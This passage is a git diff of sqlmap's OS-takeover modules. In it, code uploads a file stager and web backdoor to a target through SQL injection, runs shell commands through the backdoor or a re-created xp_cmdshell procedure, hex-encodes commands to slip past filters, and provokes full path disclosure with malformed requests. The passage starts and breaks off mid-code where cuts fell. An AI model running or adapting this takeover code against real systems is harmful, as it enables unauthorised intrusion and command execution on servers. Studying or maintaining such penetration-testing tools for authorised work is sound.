@@ def udfInjectCustom(self): msg = "do you want to call your injected user-defined " msg += "functions now? [Y/n/q] " - choice = readInput(msg, default="Y") + choice = readInput(msg, default='Y').upper() - if choice[0] in ("n", "N"): + if choice == 'N': self.cleanup(udfDict=self.udfs) return - elif choice[0] in ("q", "Q"): + elif choice == 'Q': self.cleanup(udfDict=self.udfs) raise SqlmapUserQuitException @@ -344,19 +336,20 @@ def udfInjectCustom(self): msg += "\n[q] Quit" while True: - choice = readInput(msg) + choice = readInput(msg, default=None, checkBatch=False).upper() - if choice and choice[0] in ("q", "Q"): + if choice == 'Q': break - elif isinstance(choice, basestring) and choice.isdigit() and int(choice) > 0 and int(choice) <= len(udfList): + elif isDigit(choice) and int(choice) > 0 and int(choice) <= len(udfList): choice = int(choice) break - elif isinstance(choice, int) and choice > 0 and choice <= len(udfList): - break else: warnMsg = "invalid value, only digits >= 1 and " warnMsg += "<= %d are allowed" % len(udfList) - logger.warn(warnMsg) + logger.warning(warnMsg) + + if not isinstance(choice, int): + break cmd = "" count = 1 @@ -367,7 +360,7 @@ def udfInjectCustom(self): msg += "%d (data-type: %s)? 
" % (count, inp) while True: - parValue = readInput(msg) + parValue = readInput(msg, default=None, checkBatch=False) if parValue: if "int" not in inp and "bool" not in inp: @@ -377,16 +370,15 @@ def udfInjectCustom(self): break else: - logger.warn("you need to specify the value of the parameter") + logger.warning("you need to specify the value of the parameter") count += 1 cmd = cmd[:-1] msg = "do you want to retrieve the return value of the " msg += "UDF? [Y/n] " - choice = readInput(msg, default="Y") - if choice[0] in ("y", "Y"): + if readInput(msg, default='Y', boolean=True): output = self.udfEvalCmd(cmd, udfName=udfToCall) if output: @@ -397,9 +389,8 @@ def udfInjectCustom(self): self.udfExecCmd(cmd, udfName=udfToCall, silent=True) msg = "do you want to call this or another injected UDF? [Y/n] " - choice = readInput(msg, default="Y") - if choice[0] not in ("y", "Y"): + if not readInput(msg, default='Y', boolean=True): break self.cleanup(udfDict=self.udfs) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index be26e1535b1..321840a8e4a 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -1,59 +1,72 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import io import os import posixpath import re -import StringIO - -from tempfile import mkstemp +import tempfile from extra.cloak.cloak import decloak from lib.core.agent import agent from lib.core.common import arrayizeValue from lib.core.common import Backend from lib.core.common import extractRegexResult -from lib.core.common import getDirs -from lib.core.common import getDocRoot +from lib.core.common import getAutoDirectories +from lib.core.common import getManualDirectories from lib.core.common import getPublicTypeMembers from lib.core.common import getSQLSnippet -from lib.core.common import getUnicode -from lib.core.common import ntToPosixSlashes +from lib.core.common import getTechnique +from lib.core.common import getTechniqueData +from lib.core.common import isDigit from lib.core.common import isTechniqueAvailable from lib.core.common import isWindowsDriveLetterPath from lib.core.common import normalizePath +from lib.core.common import ntToPosixSlashes +from lib.core.common import openFile +from lib.core.common import parseFilePaths from lib.core.common import posixToNtSlashes from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import singleTimeWarnMessage -from lib.core.convert import hexencode -from lib.core.convert import utf8encode +from lib.core.compat import xrange +from lib.core.convert import encodeHex +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths +from lib.core.datatype import OrderedSet from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER from lib.core.enums import OS from lib.core.enums import PAYLOAD -from lib.core.enums import WEB_API +from lib.core.enums import PLACE +from lib.core.enums import WEB_PLATFORM +from lib.core.exception import SqlmapNoneDataException +from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT from lib.core.settings import EVENTVALIDATION_REGEX +from lib.core.settings import 
SHELL_RUNCMD_EXE_TAG +from lib.core.settings import SHELL_WRITABLE_DIR_TAG from lib.core.settings import VIEWSTATE_REGEX from lib.request.connect import Connect as Request +from thirdparty.six.moves import urllib as _urllib - -class Web: +class Web(object): """ This class defines web-oriented OS takeover functionalities for plugins. """ def __init__(self): - self.webApi = None + self.webPlatform = None self.webBaseUrl = None self.webBackdoorUrl = None self.webBackdoorFilePath = None @@ -70,11 +83,11 @@ def webBackdoorRunCmd(self, cmd): if not cmd: cmd = conf.osCmd - cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd) - page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True) + cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, getUnicode(cmd)) + page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT) if page is not None: - output = re.search("<pre>(.+?)</pre>", page, re.I | re.S) + output = re.search(r"<pre>(.+?)</pre>", page, re.I | re.S) if output: output = output.group(1) @@ -86,10 +99,18 @@ def webUpload(self, destFileName, directory, stream=None, content=None, filepath if filepath.endswith('_'): content = decloak(filepath) # cloaked file else: - with open(filepath, "rb") as f: + with openFile(filepath, "rb", encoding=None) as f: content = f.read() + if content is not None: - stream = StringIO.StringIO(content) # string content + stream = io.BytesIO(getBytes(content)) # string content + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/3560 + # Reference: https://stackoverflow.com/a/4677542 + stream.seek(0, os.SEEK_END) + stream.len = stream.tell() + stream.seek(0, os.SEEK_SET) + return self._webFileStreamUpload(stream, destFileName, directory) def _webFileStreamUpload(self, stream, destFileName, directory): @@ -100,42 +121,44 @@ def _webFileStreamUpload(self, stream, destFileName, directory): except TypeError: pass - if self.webApi in getPublicTypeMembers(WEB_API, True): + if self.webPlatform in getPublicTypeMembers(WEB_PLATFORM, True): multipartParams = { - "upload": "1", - "file": stream, - "uploadDir": directory, - } + "upload": "1", + "file": stream, + "uploadDir": directory, + } - if self.webApi == WEB_API.ASPX: + if self.webPlatform == WEB_PLATFORM.ASPX: multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE - page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) + page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) - if "File uploaded" not in page: - warnMsg = "unable to upload the backdoor through " - warnMsg += "the file stager on '%s'" % directory - logger.warn(warnMsg) + if "File uploaded" not in (page or ""): + warnMsg = "unable to upload the file through the web file " + warnMsg += "stager to '%s'" % directory + logger.warning(warnMsg) return False else: return True + else: + logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webPlatform) + return False def _webFileInject(self, fileContent, fileName, directory): - outFile = posixpath.normpath("%s/%s" % (directory, fileName)) - uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) + outFile = posixpath.join(ntToPosixSlashes(directory), fileName) + uplQuery = getUnicode(fileContent).replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) query = "" - if 
isTechniqueAvailable(kb.technique): - where = kb.injection.data[kb.technique].where + if isTechniqueAvailable(getTechnique()): + where = getTechniqueData().where if where == PAYLOAD.WHERE.NEGATIVE: randInt = randomInt() query += "OR %d=%d " % (randInt, randInt) - query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery)) - query = agent.prefixQuery(query) - query = agent.suffixQuery(query) + query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=encodeHex(uplQuery, binary=False)) + query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) payload = agent.payload(newValue=query) page = Request.queryPage(payload) @@ -147,16 +170,13 @@ def webInit(self): remote directory within the web server document root. """ - if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None: + if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webPlatform is not None: return self.checkDbmsOs() - infoMsg = "trying to upload the file stager" - logger.info(infoMsg) - default = None - choices = list(getPublicTypeMembers(WEB_API, True)) + choices = list(getPublicTypeMembers(WEB_PLATFORM, True)) for ext in choices: if conf.url.endswith(ext): @@ -164,7 +184,7 @@ def webInit(self): break if not default: - default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP + default = WEB_PLATFORM.ASP if Backend.isOs(OS.WINDOWS) else WEB_PLATFORM.PHP message = "which web application language does the web server " message += "support?\n" @@ -181,174 +201,233 @@ def webInit(self): while True: choice = readInput(message, default=str(default)) - if not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") + if not isDigit(choice): + logger.warning("invalid value, only digits are allowed") elif int(choice) < 1 or int(choice) > len(choices): - logger.warn("invalid value, it must be between 1 and %d" % len(choices)) + logger.warning("invalid value, it must be between 1 and %d" % len(choices)) else: - self.webApi = choices[int(choice) - 1] + self.webPlatform = choices[int(choice) - 1] break - kb.docRoot = arrayizeValue(getDocRoot()) - directories = sorted(getDirs()) + if not kb.absFilePaths: + message = "do you want sqlmap to further try to " + message += "provoke the full path disclosure? 
[Y/n] " + + if readInput(message, default='Y', boolean=True): + headers = {} + been = set([conf.url]) + + for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I): + url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php") + if url not in been: + try: + page, _, _ = Request.getPage(url=url, raise404=False, silent=True) + parseFilePaths(page) + except: + pass + finally: + been.add(url) + + url = re.sub(r"(\.\w+)\Z", r"~\g<1>", conf.url) + if url not in been: + try: + page, _, _ = Request.getPage(url=url, raise404=False, silent=True) + parseFilePaths(page) + except: + pass + finally: + been.add(url) + + for place in (PLACE.GET, PLACE.POST): + if place in conf.parameters: + value = re.sub(r"(\A|&)(\w+)=", r"\g<2>[]=", conf.parameters[place]) + if "[]" in value: + page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + cookie = None + if PLACE.COOKIE in conf.parameters: + cookie = conf.parameters[PLACE.COOKIE] + elif headers and HTTP_HEADER.SET_COOKIE in headers: + cookie = headers[HTTP_HEADER.SET_COOKIE] + + if cookie: + value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie) + if value != cookie: + page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=", cookie) + if value != cookie: + page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + directories = list(arrayizeValue(getManualDirectories())) + directories.extend(getAutoDirectories()) + directories = list(OrderedSet(directories)) + + path = _urllib.parse.urlparse(conf.url).path or '/' + path = re.sub(r"/[^/]*\.\w+\Z", '/', path) + if path != '/': + _ = [] + for directory in directories: + _.append(directory) + if not directory.endswith(path): + _.append("%s/%s" % (directory.rstrip('/'), path.strip('/'))) + directories = _ - backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) - backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi)) + backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webPlatform) + backdoorContent = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.%s_" % self.webPlatform))) - stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) - stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) + stagerContent = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform))) - success = False + for directory in directories: + if not directory: + continue - for docRoot in kb.docRoot: - if success: - break + stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform) + self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) - for directory in directories: - uriPath = "" + uploaded = False + directory = ntToPosixSlashes(normalizePath(directory)) - if not all(isinstance(_, basestring) for _ in (docRoot, directory)): - continue + if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'): + directory = "/%s" % directory - directory = ntToPosixSlashes(normalizePath(directory)).replace("//", "/").rstrip('/') - docRoot = 
ntToPosixSlashes(normalizePath(docRoot)).replace("//", "/").rstrip('/') - - # '' or '/' -> 'docRoot' - if not directory: - localPath = docRoot - uriPath = '/' - # 'dir1/dir2/dir3' -> 'docRoot/dir1/dir2/dir3' - elif not isWindowsDriveLetterPath(directory) and directory[0] != '/': - localPath = "%s/%s" % (docRoot, directory) - uriPath = "/%s" % directory - else: - localPath = directory - uriPath = directory[2:] if isWindowsDriveLetterPath(directory) else directory - docRoot = docRoot[2:] if isWindowsDriveLetterPath(docRoot) else docRoot + if not directory.endswith('/'): + directory += '/' - if docRoot in uriPath: - uriPath = uriPath.replace(docRoot, "/") - uriPath = "/%s" % normalizePath(uriPath) - else: - webDir = extractRegexResult(r"//[^/]+?/(?P<result>.*)/.", conf.url) + # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method + infoMsg = "trying to upload the file stager on '%s' " % directory + infoMsg += "via LIMIT 'LINES TERMINATED BY' method" + logger.info(infoMsg) + self._webFileInject(stagerContent, stagerName, directory) - if webDir: - uriPath = "/%s" % webDir - else: - continue + for match in re.finditer('/', directory): + self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) + self.webStagerUrl = _urllib.parse.urljoin(self.webBaseUrl, stagerName) + debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl + logger.debug(debugMsg) - localPath = posixpath.normpath(localPath).rstrip('/') - uriPath = posixpath.normpath(uriPath).rstrip('/') + uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) + uplPage = uplPage or "" - # Upload the file stager with the LIMIT 0, 1 INTO OUTFILE technique - self._webFileInject(stagerContent, stagerName, localPath) + if "sqlmap file uploader" in uplPage: + uploaded = True + break - self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath) - self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName) - self.webStagerFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, stagerName))).replace("//", "/").rstrip('/') + # Fall-back to UNION queries file upload method + if not uploaded: + warnMsg = "unable to upload the file stager " + warnMsg += "on '%s'" % directory + singleTimeWarnMessage(warnMsg) - uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) - uplPage = uplPage or "" + if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): + infoMsg = "trying to upload the file stager on '%s' " % directory + infoMsg += "via UNION method" + logger.info(infoMsg) + + stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform) + self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) - # Fall-back to UNION queries file upload technique - if "sqlmap file uploader" not in uplPage: - warnMsg = "unable to upload the file stager " - warnMsg += "on '%s'" % localPath - singleTimeWarnMessage(warnMsg) + handle, filename = tempfile.mkstemp() + os.close(handle) - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - infoMsg = "trying to upload the file stager via " - infoMsg += "UNION technique" - logger.info(infoMsg) + with openFile(filename, "w+") as f: + _ = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform))) + _ = _.replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) + f.write(_) - handle, filename = mkstemp() - os.fdopen(handle).close() # close low 
level handle (causing problems later) + self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True) - with open(filename, "w+") as f: - _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) - _ = _.replace("WRITABLE_DIR", localPath.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else localPath) - f.write(utf8encode(_)) + for match in re.finditer('/', directory): + self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) + self.webStagerUrl = _urllib.parse.urljoin(self.webBaseUrl, stagerName) - self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True) + debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl + logger.debug(debugMsg) uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) uplPage = uplPage or "" - if "sqlmap file uploader" not in uplPage: - continue - else: - continue + if "sqlmap file uploader" in uplPage: + uploaded = True + break - if "<%" in uplPage or "<?" in uplPage: - warnMsg = "file stager uploaded on '%s', " % localPath - warnMsg += "but not dynamically interpreted" - logger.warn(warnMsg) - continue + if not uploaded: + continue - elif self.webApi == WEB_API.ASPX: - kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage) - kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage) + if "<%" in uplPage or "<?" in uplPage: + warnMsg = "file stager uploaded on '%s', " % directory + warnMsg += "but not dynamically interpreted" + logger.warning(warnMsg) + continue - infoMsg = "the file stager has been successfully uploaded " - infoMsg += "on '%s' - %s" % (localPath, self.webStagerUrl) - logger.info(infoMsg) + elif self.webPlatform == WEB_PLATFORM.ASPX: + kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage) + kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage) - if self.webApi == WEB_API.ASP: - match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage) + infoMsg = "the file stager has been successfully uploaded " + infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl) + logger.info(infoMsg) - if match: - backdoorDirectory = match.group(1) - else: - continue + if self.webPlatform == WEB_PLATFORM.ASP: + match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage) + + if match: + backdoorDirectory = match.group(1) + else: + continue + + _ = "tmpe%s.exe" % randomStr(lowercase=True) + if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace(SHELL_WRITABLE_DIR_TAG, backdoorDirectory).replace(SHELL_RUNCMD_EXE_TAG, _)): + self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_")) + self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) + self.webDirectory = backdoorDirectory + else: + continue - _ = "tmpe%s.exe" % randomStr(lowercase=True) - if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)): - self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_')) - self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) - self.webDirectory = backdoorDirectory + else: + if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent): + warnMsg = "backdoor has not been successfully uploaded " 
+ warnMsg += "through the file stager possibly because " + warnMsg += "the user running the web server process " + warnMsg += "has not write privileges over the folder " + warnMsg += "where the user running the DBMS process " + warnMsg += "was able to upload the file stager or " + warnMsg += "because the DBMS and web server sit on " + warnMsg += "different servers" + logger.warning(warnMsg) + + message = "do you want to try the same method used " + message += "for the file stager? [Y/n] " + + if readInput(message, default='Y', boolean=True): + self._webFileInject(backdoorContent, backdoorName, directory) else: continue - else: - if not self.webUpload(backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath, content=backdoorContent): - warnMsg = "backdoor has not been successfully uploaded " - warnMsg += "through the file stager possibly because " - warnMsg += "the user running the web server process " - warnMsg += "has not write privileges over the folder " - warnMsg += "where the user running the DBMS process " - warnMsg += "was able to upload the file stager or " - warnMsg += "because the DBMS and web server sit on " - warnMsg += "different servers" - logger.warn(warnMsg) - - message = "do you want to try the same method used " - message += "for the file stager? [Y/n] " - getOutput = readInput(message, default="Y") - - if getOutput in ("y", "Y"): - self._webFileInject(backdoorContent, backdoorName, localPath) - else: - continue - - self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName) - self.webDirectory = localPath - - self.webBackdoorFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, backdoorName))).replace("//", "/").rstrip('/') - - testStr = "command execution test" - output = self.webBackdoorRunCmd("echo %s" % testStr) - - if output and testStr in output: - infoMsg = "the backdoor has been successfully " - else: - infoMsg = "the backdoor has probably been successfully " + self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName) + self.webDirectory = directory - infoMsg += "uploaded on '%s' - " % self.webDirectory - infoMsg += self.webBackdoorUrl - logger.info(infoMsg) + self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName) - success = True + testStr = "command execution test" + output = self.webBackdoorRunCmd("echo %s" % testStr) - break + if output == "0": + warnMsg = "the backdoor has been uploaded but required privileges " + warnMsg += "for running the system commands are missing" + raise SqlmapNoneDataException(warnMsg) + elif output and testStr in output: + infoMsg = "the backdoor has been successfully " + else: + infoMsg = "the backdoor has probably been successfully " + + infoMsg += "uploaded on '%s' - " % self.webDirectory + infoMsg += self.webBackdoorUrl + logger.info(infoMsg) + + break diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index ffd6a6ce8f7..abefda27ba1 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -1,12 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.agent import agent from lib.core.common import Backend +from lib.core.common import flattenValue from lib.core.common import getLimitRange from lib.core.common import getSQLSnippet from lib.core.common import hashDBWrite @@ 
-14,15 +15,17 @@ from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable -from lib.core.common import pushValue from lib.core.common import popValue +from lib.core.common import pushValue from lib.core.common import randomStr from lib.core.common import readInput -from lib.core.common import wasLastRequestDelayed -from lib.core.convert import hexencode +from lib.core.common import wasLastResponseDelayed +from lib.core.compat import xrange +from lib.core.convert import encodeHex from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED @@ -32,7 +35,7 @@ from lib.core.threads import getCurrentThreadData from lib.request import inject -class Xp_cmdshell: +class XP_cmdshell(object): """ This class defines methods to deal with Microsoft SQL Server xp_cmdshell extended procedure for plugins. @@ -44,19 +47,18 @@ def __init__(self): def _xpCmdshellCreate(self): cmd = "" - if Backend.isVersionWithin(("2005", "2008")): + if not Backend.isVersionWithin(("2000",)): logger.debug("activating sp_OACreate") cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") inject.goStacked(agent.runAsDBMSUser(cmd)) self._randStr = randomStr(lowercase=True) - self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True) - self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew + self.xpCmdshellStr = "master..new_xp_cmdshell" - cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew) + cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr) - if Backend.isVersionWithin(("2005", "2008")): + if not Backend.isVersionWithin(("2000",)): cmd += ";RECONFIGURE WITH OVERRIDE" inject.goStacked(agent.runAsDBMSUser(cmd)) @@ -83,10 +85,10 @@ def _xpCmdshellConfigure2000(self, mode): return cmd def _xpCmdshellConfigure(self, mode): - if Backend.isVersionWithin(("2005", "2008")): - cmd = self._xpCmdshellConfigure2005(mode) - else: + if Backend.isVersionWithin(("2000",)): cmd = self._xpCmdshellConfigure2000(mode) + else: + cmd = self._xpCmdshellConfigure2005(mode) inject.goStacked(agent.runAsDBMSUser(cmd)) @@ -94,8 +96,9 @@ def _xpCmdshellCheck(self): cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2) self.xpCmdshellExecCmd(cmd) - return wasLastRequestDelayed() + return wasLastResponseDelayed() + @stackedmethod def _xpCmdshellTest(self): threadData = getCurrentThreadData() pushValue(threadData.disableStdOut) @@ -106,14 +109,16 @@ def _xpCmdshellTest(self): if output == "1": logger.info("xp_cmdshell extended procedure is usable") - elif isNoneValue(output): + elif isNoneValue(output) and conf.dbmsCred: errMsg = "it seems that the temporary directory ('%s') used for " % self.getRemoteTempPath() errMsg += "storing console output within the back-end file system " errMsg += "does not have writing permissions for the DBMS process. 
" errMsg += "You are advised to manually adjust it with option " - errMsg += "--tmp-path switch or you will not be able to retrieve " - errMsg += "the commands output" + errMsg += "'--tmp-path' or you won't be able to retrieve " + errMsg += "the command(s) output" logger.error(errMsg) + elif isNoneValue(output): + logger.error("unable to retrieve xp_cmdshell output") else: logger.info("xp_cmdshell extended procedure is usable") @@ -132,7 +137,7 @@ def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile): for line in lines: echoedLine = "echo %s " % line - echoedLine += ">> \"%s\%s\"" % (tmpPath, randDestFile) + echoedLine += ">> \"%s\\%s\"" % (tmpPath, randDestFile) echoedLines.append(echoedLine) for echoedLine in echoedLines: @@ -140,13 +145,13 @@ def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile): charCounter += len(echoedLine) if charCounter >= maxLen: - self.xpCmdshellExecCmd(cmd) + self.xpCmdshellExecCmd(cmd.rstrip(" & ")) cmd = "" charCounter = 0 if cmd: - self.xpCmdshellExecCmd(cmd) + self.xpCmdshellExecCmd(cmd.rstrip(" & ")) def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None): # When user provides DBMS credentials (with --dbms-cred) we need to @@ -161,9 +166,12 @@ def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None): # Obfuscate the command to execute, also useful to bypass filters # on single-quotes self._randStr = randomStr(lowercase=True) - self._cmd = "0x%s" % hexencode(cmd) self._forgedCmd = "DECLARE @%s VARCHAR(8000);" % self._randStr - self._forgedCmd += "SET @%s=%s;" % (self._randStr, self._cmd) + + try: + self._forgedCmd += "SET @%s=%s;" % (self._randStr, "0x%s" % encodeHex(cmd, binary=False)) + except UnicodeError: + self._forgedCmd += "SET @%s='%s';" % (self._randStr, cmd) # Insert the command standard output into a support table, # 'sqlmapoutput', except when DBMS credentials are provided because @@ -171,17 +179,18 @@ def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None): # retrieve the output when OPENROWSET is used hence the redirection # to a temporary file from above if insertIntoTable and not conf.dbmsCred: - self._forgedCmd += "INSERT INTO %s " % insertIntoTable + self._forgedCmd += "INSERT INTO %s(data) " % insertIntoTable self._forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self._randStr) return agent.runAsDBMSUser(self._forgedCmd) def xpCmdshellExecCmd(self, cmd, silent=False): - cmd = self.xpCmdshellForgeCmd(cmd) - return inject.goStacked(cmd, silent) + return inject.goStacked(self.xpCmdshellForgeCmd(cmd), silent) def xpCmdshellEvalCmd(self, cmd, first=None, last=None): + output = None + if conf.direct: output = self.xpCmdshellExecCmd(cmd) @@ -206,13 +215,14 @@ def xpCmdshellEvalCmd(self, cmd, first=None, last=None): inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10))) self.delRemoteFile(self.tmpFile) - query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName) + query = "SELECT %s FROM %s ORDER BY id" % (self.tblField, self.cmdTblName) if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: output = inject.getValue(query, resumeValue=False, blind=False, time=False) - else: + + if (output is None) or len(output) == 0 or output[0] is None: output = [] - count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count 
